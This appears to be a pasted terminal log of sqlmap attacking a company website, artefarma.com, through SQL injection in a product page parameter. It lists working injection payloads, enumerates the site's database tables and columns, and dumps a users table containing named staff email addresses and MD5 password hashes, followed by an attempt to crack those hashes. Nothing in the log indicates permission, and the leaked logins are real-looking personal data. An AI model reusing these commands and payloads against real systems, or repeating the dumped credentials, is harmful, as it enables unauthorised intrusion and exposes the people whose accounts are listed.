- Payload: id=-4593 OR 5414=SLEEP(5)
- ---
- [00:11:37] [INFO] the back-end DBMS is MySQL
- web server operating system: Windows 2008 R2 or 7
- web application technology: ASP.NET, Microsoft IIS 7.5
- back-end DBMS: MySQL 5.0
- [00:11:37] [INFO] fetching tables for database: 'artefarma_bdsqlartefarma'
- [00:11:37] [INFO] the SQL query used returns 25 entries
- Database: artefarma_bdsqlartefarma
- [25 tables]
- +--------------------------+
- | arquivos |
- | clientes |
- | contato |
- | faq |
- | galeriahome |
- | galeriainstitucional |
- | galeriaprodutos |
- | galeriaprojetosespeciais |
- | log_acesso |
- | loja |
- | loja_imagem |
- | n_emails |
- | noticias |
- | pagclientes |
- | pagcontato |
- | paghome |
- | paginstitucional |
- | pagorcamento |
- | pastas |
- | produto |
- | produtos |
- | projetosespeciais |
- | upload |
- | usuario |
- | usuarios |
- +--------------------------+
- [00:11:37] [INFO] fetched data logged to text files under '/usr/share/sqlmap/output/www.artefarma.com'
- [*] shutting down at 00:11:37
- root@Gudiofor:~# sqlmap -u http://www.artefarma.com/produtos.php?id=26%27 -D artefarma_bdsqlartefarma -C usu_cod,usu_nom,usu_pwd,usu_tip --tables
- sqlmap/1.0-dev - automatic SQL injection and database takeover tool
- http://sqlmap.org
- [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
- [*] starting at 00:12:30
- [00:12:30] [WARNING] it appears that you have provided tainted parameter values ('id=26'') with most probably leftover chars/statements from manual SQL injection test(s). Please, always use only valid parameter values so sqlmap could be able to run properly
- Are you sure you want to continue? [y/N] y
- [00:12:32] [INFO] resuming back-end DBMS 'mysql'
- [00:12:37] [INFO] testing connection to the target URL
- [00:12:43] [INFO] heuristics detected web page charset 'ascii'
- [00:12:43] [WARNING] there is a DBMS error found in the HTTP response body which could interfere with the results of the tests
- sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
- ---
- Place: GET
- Parameter: id
- Type: boolean-based blind
- Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
- Payload: id=-4224 OR (8424=8424)#
- Type: error-based
- Title: MySQL >= 5.0 OR error-based - WHERE or HAVING clause
- Payload: id=-6452 OR (SELECT 8984 FROM(SELECT COUNT(*),CONCAT(0x7168617871,(SELECT (CASE WHEN (8984=8984) THEN 1 ELSE 0 END)),0x7179756d71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
- Type: UNION query
- Title: MySQL UNION query (random number) - 4 columns
- Payload: id=-2099 UNION ALL SELECT CONCAT(0x7168617871,0x654d70576654654b7a59,0x7179756d71),1532,1532,1532#
- Type: AND/OR time-based blind
- Title: MySQL > 5.0.11 OR time-based blind
- Payload: id=-4593 OR 5414=SLEEP(5)
- ---
- [00:12:43] [INFO] the back-end DBMS is MySQL
- web server operating system: Windows 2008 R2 or 7
- web application technology: ASP.NET, Microsoft IIS 7.5
- back-end DBMS: MySQL 5.0
- [00:12:43] [INFO] fetching tables for database: 'artefarma_bdsqlartefarma'
- [00:12:43] [INFO] the SQL query used returns 25 entries
- Database: artefarma_bdsqlartefarma
- [25 tables]
- +--------------------------+
- | arquivos |
- | clientes |
- | contato |
- | faq |
- | galeriahome |
- | galeriainstitucional |
- | galeriaprodutos |
- | galeriaprojetosespeciais |
- | log_acesso |
- | loja |
- | loja_imagem |
- | n_emails |
- | noticias |
- | pagclientes |
- | pagcontato |
- | paghome |
- | paginstitucional |
- | pagorcamento |
- | pastas |
- | produto |
- | produtos |
- | projetosespeciais |
- | upload |
- | usuario |
- | usuarios |
- +--------------------------+
- [00:12:43] [INFO] fetched data logged to text files under '/usr/share/sqlmap/output/www.artefarma.com'
- [*] shutting down at 00:12:43
- root@Gudiofor:~# sqlmap -u http://www.artefarma.com/produtos.php?id=26%27 -D artefarma_bdsqlartefarma -T usuario,usuarios --columns
- sqlmap/1.0-dev - automatic SQL injection and database takeover tool
- http://sqlmap.org
- [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
- [*] starting at 00:14:41
- [00:14:41] [WARNING] it appears that you have provided tainted parameter values ('id=26'') with most probably leftover chars/statements from manual SQL injection test(s). Please, always use only valid parameter values so sqlmap could be able to run properly
- Are you sure you want to continue? [y/N] y
- [00:14:42] [INFO] resuming back-end DBMS 'mysql'
- [00:14:42] [INFO] testing connection to the target URL
- [00:14:43] [INFO] heuristics detected web page charset 'ascii'
- [00:14:43] [WARNING] there is a DBMS error found in the HTTP response body which could interfere with the results of the tests
- sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
- ---
- Place: GET
- Parameter: id
- Type: boolean-based blind
- Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
- Payload: id=-4224 OR (8424=8424)#
- Type: error-based
- Title: MySQL >= 5.0 OR error-based - WHERE or HAVING clause
- Payload: id=-6452 OR (SELECT 8984 FROM(SELECT COUNT(*),CONCAT(0x7168617871,(SELECT (CASE WHEN (8984=8984) THEN 1 ELSE 0 END)),0x7179756d71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
- Type: UNION query
- Title: MySQL UNION query (random number) - 4 columns
- Payload: id=-2099 UNION ALL SELECT CONCAT(0x7168617871,0x654d70576654654b7a59,0x7179756d71),1532,1532,1532#
- Type: AND/OR time-based blind
- Title: MySQL > 5.0.11 OR time-based blind
- Payload: id=-4593 OR 5414=SLEEP(5)
- ---
- [00:14:43] [INFO] the back-end DBMS is MySQL
- web server operating system: Windows 2008 R2 or 7
- web application technology: ASP.NET, Microsoft IIS 7.5
- back-end DBMS: MySQL 5.0
- [00:14:43] [INFO] fetching columns for table 'usuario' in database 'artefarma_bdsqlartefarma'
- [00:14:43] [INFO] the SQL query used returns 4 entries
- [00:14:43] [INFO] resumed: "usu_cod","int(11)","usu_cod","int(11)","usu_cod","int(11)","usu_cod","int(11)"
- [00:14:43] [INFO] resumed: "usu_nom","varchar(45)","usu_nom","varchar(45)","usu_nom","varchar(45)","usu_nom","varchar(45)"
- [00:14:43] [INFO] resumed: "usu_pwd","varchar(500)","usu_pwd","varchar(500)","usu_pwd","varchar(500)","usu_pwd","varchar(500)"
- [00:14:43] [INFO] resumed: "usu_tip","int(11)","usu_tip","int(11)","usu_tip","int(11)","usu_tip","int(11)"
- [00:14:44] [INFO] fetching columns for table 'usuarios' in database 'artefarma_bdsqlartefarma'
- [00:14:44] [INFO] the SQL query used returns 4 entries
- [00:14:44] [INFO] resumed: "id","int(11)","id","int(11)","id","int(11)","id","int(11)"
- [00:14:44] [INFO] resumed: "nome","varchar(200)","nome","varchar(200)","nome","varchar(200)","nome","varchar(200)"
- [00:14:44] [INFO] resumed: "login","varchar(100)","login","varchar(100)","login","varchar(100)","login","varchar(100)"
- [00:14:44] [INFO] resumed: "senha","varchar(300)","senha","varchar(300)","senha","varchar(300)","senha","varchar(300)"
- Database: artefarma_bdsqlartefarma
- Table: usuarios
- [4 columns]
- +--------+--------------+
- | Column | Type |
- +--------+--------------+
- | id | int(11) |
- | login | varchar(100) |
- | nome | varchar(200) |
- | senha | varchar(300) |
- +--------+--------------+
- Database: artefarma_bdsqlartefarma
- Table: usuario
- [4 columns]
- +---------+--------------+
- | Column | Type |
- +---------+--------------+
- | usu_cod | int(11) |
- | usu_nom | varchar(45) |
- | usu_pwd | varchar(500) |
- | usu_tip | int(11) |
- +---------+--------------+
- [00:14:44] [INFO] fetched data logged to text files under '/usr/share/sqlmap/output/www.artefarma.com'
- [*] shutting down at 00:14:44
- root@Gudiofor:~# sqlmap -u http://www.artefarma.com/produtos.php?id=26%27 -D artefarma_bdsqlartefarma -T usuario -C id,login,nome,senha --dump
- sqlmap/1.0-dev - automatic SQL injection and database takeover tool
- http://sqlmap.org
- [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
- [*] starting at 00:15:14
- [00:15:14] [WARNING] it appears that you have provided tainted parameter values ('id=26'') with most probably leftover chars/statements from manual SQL injection test(s). Please, always use only valid parameter values so sqlmap could be able to run properly
- Are you sure you want to continue? [y/N] y
- [00:15:15] [INFO] resuming back-end DBMS 'mysql'
- [00:15:15] [INFO] testing connection to the target URL
- [00:15:15] [INFO] heuristics detected web page charset 'ascii'
- [00:15:16] [WARNING] there is a DBMS error found in the HTTP response body which could interfere with the results of the tests
- sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
- ---
- Place: GET
- Parameter: id
- Type: boolean-based blind
- Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
- Payload: id=-4224 OR (8424=8424)#
- Type: error-based
- Title: MySQL >= 5.0 OR error-based - WHERE or HAVING clause
- Payload: id=-6452 OR (SELECT 8984 FROM(SELECT COUNT(*),CONCAT(0x7168617871,(SELECT (CASE WHEN (8984=8984) THEN 1 ELSE 0 END)),0x7179756d71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
- Type: UNION query
- Title: MySQL UNION query (random number) - 4 columns
- Payload: id=-2099 UNION ALL SELECT CONCAT(0x7168617871,0x654d70576654654b7a59,0x7179756d71),1532,1532,1532#
- Type: AND/OR time-based blind
- Title: MySQL > 5.0.11 OR time-based blind
- Payload: id=-4593 OR 5414=SLEEP(5)
- ---
- [00:15:16] [INFO] the back-end DBMS is MySQL
- web server operating system: Windows 2008 R2 or 7
- web application technology: ASP.NET, Microsoft IIS 7.5
- back-end DBMS: MySQL 5.0
- [00:15:16] [INFO] fetching columns 'id, login, nome, senha' for table 'usuario' in database 'artefarma_bdsqlartefarma'
- [00:15:16] [WARNING] reflective value(s) found and filtering out
- [00:15:16] [WARNING] unable to retrieve column names for table 'usuario' in database 'artefarma_bdsqlartefarma'
- [00:15:16] [INFO] fetching entries of column(s) 'id, login, nome, senha' for table 'usuario' in database 'artefarma_bdsqlartefarma'
- [00:15:16] [INFO] the SQL query used returns 3 entries
- [00:15:18] [INFO] the SQL query used returns 3 entries
- [00:15:20] [INFO] fetching number of column(s) 'id, login, nome, senha' entries for table 'usuario' in database 'artefarma_bdsqlartefarma'
- [00:15:20] [INFO] resumed: 3
- [00:15:20] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
- [00:15:20] [INFO] retrieved: 477
- [00:15:33] [INFO] retrieved:
- [00:16:02] [INFO] retrieved:
- [00:16:02] [WARNING] it is very important not to stress the network adapter during usage of time-based payloads to prevent potential errors
- do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] y
- !
- [00:16:19] [INFO] retrieved:
- [00:16:54] [INFO] retrieved:
- [00:16:56] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
- [00:16:56] [INFO] retrieved:
- [00:18:42] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request
- [00:18:49] [INFO] retrieved:
- [00:18:54] [INFO] retrieved: 477
- [00:19:34] [INFO] retrieved:
- [00:20:12] [INFO] retrieved:
- [00:20:13] [INFO] retrieved:
- [00:20:37] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request
- [00:21:08] [INFO] retrieved:
- [00:21:10] [INFO] retrieved:
- [00:21:40] [INFO] retrieved:
- [00:21:47] [INFO] retrieved: 477
- [00:22:49] [INFO] retrieved:
- [00:24:02] [INFO] retrieved:
- [00:24:05] [INFO] retrieved:
- [00:25:24] [INFO] retrieved:
- [00:25:28] [INFO] retrieved:
- [00:26:54] [INFO] retrieved:
- [00:26:57] [INFO] analyzing table dump for possible password hashes
- Database: artefarma_bdsqlartefarma
- Table: usuario
- [3 entries]
- +-----+---------+---------+---------+
- | id | nome | login | senha |
- +-----+---------+---------+---------+
- | 477 | <blank> | !\x03 | <blank> |
- | 477 | <blank> | <blank> | <blank> |
- | 477 | <blank> | <blank> | <blank> |
- +-----+---------+---------+---------+
- [00:26:57] [INFO] table 'artefarma_bdsqlartefarma.usuario' dumped to CSV file '/usr/share/sqlmap/output/www.artefarma.com/dump/artefarma_bdsqlartefarma/usuario.csv'
- [00:26:57] [WARNING] HTTP error codes detected during run:
- 500 (Internal Server Error) - 31 times
- [00:26:57] [INFO] fetched data logged to text files under '/usr/share/sqlmap/output/www.artefarma.com'
- [*] shutting down at 00:26:57
- root@Gudiofor:~# sqlmap -u http://www.artefarma.com/produtos.php?id=26%27 -D artefarma_bdsqlartefarma -T usuarios --columns
- sqlmap/1.0-dev - automatic SQL injection and database takeover tool
- http://sqlmap.org
- [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
- [*] starting at 00:29:49
- [00:29:49] [WARNING] it appears that you have provided tainted parameter values ('id=26'') with most probably leftover chars/statements from manual SQL injection test(s). Please, always use only valid parameter values so sqlmap could be able to run properly
- Are you sure you want to continue? [y/N] y
- [00:29:50] [INFO] resuming back-end DBMS 'mysql'
- [00:29:50] [INFO] testing connection to the target URL
- [00:29:53] [INFO] heuristics detected web page charset 'ascii'
- [00:29:53] [WARNING] there is a DBMS error found in the HTTP response body which could interfere with the results of the tests
- sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
- ---
- Place: GET
- Parameter: id
- Type: boolean-based blind
- Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
- Payload: id=-4224 OR (8424=8424)#
- Type: error-based
- Title: MySQL >= 5.0 OR error-based - WHERE or HAVING clause
- Payload: id=-6452 OR (SELECT 8984 FROM(SELECT COUNT(*),CONCAT(0x7168617871,(SELECT (CASE WHEN (8984=8984) THEN 1 ELSE 0 END)),0x7179756d71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
- Type: UNION query
- Title: MySQL UNION query (random number) - 4 columns
- Payload: id=-2099 UNION ALL SELECT CONCAT(0x7168617871,0x654d70576654654b7a59,0x7179756d71),1532,1532,1532#
- Type: AND/OR time-based blind
- Title: MySQL > 5.0.11 OR time-based blind
- Payload: id=-4593 OR 5414=SLEEP(5)
- ---
- [00:29:53] [INFO] the back-end DBMS is MySQL
- web server operating system: Windows 2008 R2 or 7
- web application technology: ASP.NET, Microsoft IIS 7.5
- back-end DBMS: MySQL 5.0
- [00:29:53] [INFO] fetching columns for table 'usuarios' in database 'artefarma_bdsqlartefarma'
- [00:29:53] [INFO] the SQL query used returns 4 entries
- [00:29:53] [INFO] resumed: "id","int(11)","id","int(11)","id","int(11)","id","int(11)"
- [00:29:53] [INFO] resumed: "nome","varchar(200)","nome","varchar(200)","nome","varchar(200)","nome","varchar(200)"
- [00:29:53] [INFO] resumed: "login","varchar(100)","login","varchar(100)","login","varchar(100)","login","varchar(100)"
- [00:29:53] [INFO] resumed: "senha","varchar(300)","senha","varchar(300)","senha","varchar(300)","senha","varchar(300)"
- Database: artefarma_bdsqlartefarma
- Table: usuarios
- [4 columns]
- +--------+--------------+
- | Column | Type |
- +--------+--------------+
- | id | int(11) |
- | login | varchar(100) |
- | nome | varchar(200) |
- | senha | varchar(300) |
- +--------+--------------+
- [00:29:53] [INFO] fetched data logged to text files under '/usr/share/sqlmap/output/www.artefarma.com'
- [*] shutting down at 00:29:53
- root@Gudiofor:~# sqlmap -u http://www.artefarma.com/produtos.php?id=26%27 -D artefarma_bdsqlartefarma -T usuarios -C id,login,nome,senha --dump
- sqlmap/1.0-dev - automatic SQL injection and database takeover tool
- http://sqlmap.org
- [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
- [*] starting at 00:30:19
- [00:30:19] [WARNING] it appears that you have provided tainted parameter values ('id=26'') with most probably leftover chars/statements from manual SQL injection test(s). Please, always use only valid parameter values so sqlmap could be able to run properly
- Are you sure you want to continue? [y/N] y
- [00:30:20] [INFO] resuming back-end DBMS 'mysql'
- [00:30:24] [INFO] testing connection to the target URL
- [00:30:25] [INFO] heuristics detected web page charset 'ascii'
- [00:30:25] [WARNING] there is a DBMS error found in the HTTP response body which could interfere with the results of the tests
- sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
- ---
- Place: GET
- Parameter: id
- Type: boolean-based blind
- Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
- Payload: id=-4224 OR (8424=8424)#
- Type: error-based
- Title: MySQL >= 5.0 OR error-based - WHERE or HAVING clause
- Payload: id=-6452 OR (SELECT 8984 FROM(SELECT COUNT(*),CONCAT(0x7168617871,(SELECT (CASE WHEN (8984=8984) THEN 1 ELSE 0 END)),0x7179756d71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
- Type: UNION query
- Title: MySQL UNION query (random number) - 4 columns
- Payload: id=-2099 UNION ALL SELECT CONCAT(0x7168617871,0x654d70576654654b7a59,0x7179756d71),1532,1532,1532#
- Type: AND/OR time-based blind
- Title: MySQL > 5.0.11 OR time-based blind
- Payload: id=-4593 OR 5414=SLEEP(5)
- ---
- [00:30:25] [INFO] the back-end DBMS is MySQL
- web server operating system: Windows 2008 R2 or 7
- web application technology: ASP.NET, Microsoft IIS 7.5
- back-end DBMS: MySQL 5.0
- [00:30:25] [INFO] fetching columns 'id, login, nome, senha' for table 'usuarios' in database 'artefarma_bdsqlartefarma'
- [00:30:27] [WARNING] reflective value(s) found and filtering out
- [00:30:27] [INFO] the SQL query used returns 4 entries
- [00:30:34] [INFO] retrieved: "id","int(11)"
- [00:30:35] [INFO] retrieved: "nome","varchar(200)"
- [00:30:36] [INFO] retrieved: "login","varchar(100)"
- [00:30:37] [INFO] retrieved: "senha","varchar(300)"
- [00:30:37] [INFO] fetching entries of column(s) 'id, login, nome, senha' for table 'usuarios' in database 'artefarma_bdsqlartefarma'
- [00:30:38] [INFO] the SQL query used returns 3 entries
- [00:30:39] [INFO] retrieved: "7","jeffe@artefarma.com","jefferson","5cd3f50a183e55a6ac34d18601a70c05"
- [00:30:40] [INFO] retrieved: "8","fabiene@artefarma.com","Fabiene","5cd3f50a183e55a6ac34d18601a70c05"
- [00:30:40] [INFO] retrieved: "9","solange@activadigital.com.br","solange","5cd3f50a183e55a6ac34d18601a70c05"
- [00:30:41] [INFO] analyzing table dump for possible password hashes
- [00:30:41] [INFO] recognized possible password hashes in column 'senha'
- do you want to store hashes to a temporary file for eventual further processing with other tools [y/N] y
- [00:30:47] [INFO] writing hashes to a temporary file '/tmp/sqlmaphashes-U9JueC.txt'
- do you want to crack them via a dictionary-based attack? [Y/n/q] Y
- [00:30:49] [INFO] using hash method 'md5_generic_passwd'
- what dictionary do you want to use?
- [1] default dictionary file '/usr/share/sqlmap/txt/wordlist.zip' (press Enter)
- [2] custom dictionary file
- [3] file with list of dictionary files
- >
- [00:30:52] [INFO] using default dictionary
- do you want to use common password suffixes? (slow!) [y/N] y
- [00:30:53] [INFO] starting dictionary-based cracking (md5_generic_passwd)
- [00:30:53] [INFO] starting 4 processes
- [00:44:52] [INFO] using suffix '1'
- [00:45:00] [INFO] using suffix '123'
- [00:45:08] [INFO] using suffix '2'
- [00:45:16] [INFO] using suffix '12'
- [00:45:23] [INFO] using suffix '3'
- [00:45:31] [INFO] using suffix '13'
- [00:45:38] [INFO] using suffix '7'
- [00:45:46] [INFO] using suffix '11'
- [00:45:53] [INFO] using suffix '5'
- [00:46:17] [INFO] using suffix '22'
- [00:46:24] [INFO] using suffix '23'
- [00:46:31] [INFO] using suffix '01'
- [00:46:39] [INFO] using suffix '4'
- [00:46:46] [INFO] using suffix '07'
- [00:47:09] [INFO] using suffix '21'
- [00:47:16] [INFO] using suffix '14'
- [00:47:23] [INFO] using suffix '10'
- [00:47:30] [INFO] using suffix '06'
- [00:47:37] [INFO] using suffix '08'
- [00:47:45] [INFO] using suffix '8'
- [00:47:52] [INFO] using suffix '15'
- [00:47:59] [INFO] using suffix '69'
- [00:48:06] [INFO] using suffix '16'
- [00:48:13] [INFO] using suffix '6'
- [00:48:21] [INFO] using suffix '18'
- [00:48:29] [INFO] using suffix '!'
- [00:48:37] [INFO] using suffix '.'
- [00:48:45] [INFO] using suffix '*'
- [00:48:52] [INFO] using suffix '!!'
- [00:48:59] [INFO] using suffix '?'
- [00:49:07] [INFO] using suffix ';'
- [00:49:14] [INFO] using suffix '..'
- [00:49:21] [INFO] using suffix '!!!'
- [00:49:28] [INFO] using suffix ', '
- [00:49:35] [INFO] using suffix '@'
- [00:49:43] [WARNING] no clear password(s) found
- [00:49:43] [INFO] postprocessing table dump
- Database: artefarma_bdsqlartefarma
- Table: usuarios
- [3 entries]
- +----+-----------+------------------------------+----------------------------------+
- | id | nome | login | senha |
- +----+-----------+------------------------------+----------------------------------+
- | 7 | jefferson | jeffe@artefarma.com | 5cd3f50a183e55a6ac34d18601a70c05 |
- | 8 | Fabiene | fabiene@artefarma.com | 5cd3f50a183e55a6ac34d18601a70c05 |
- | 9 | solange | solange@activadigital.com.br | 5cd3f50a183e55a6ac34d18601a70c05 |
- +----+-----------+------------------------------+----------------------------------+
- [00:49:43] [INFO] table 'artefarma_bdsqlartefarma.usuarios' dumped to CSV file '/usr/share/sqlmap/output/www.artefarma.com/dump/artefarma_bdsqlartefarma/usuarios.csv'
- [00:49:43] [INFO] fetched data logged to text files under '/usr/share/sqlmap/output/www.artefarma.com'
- [*] shutting down at 00:49:43
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement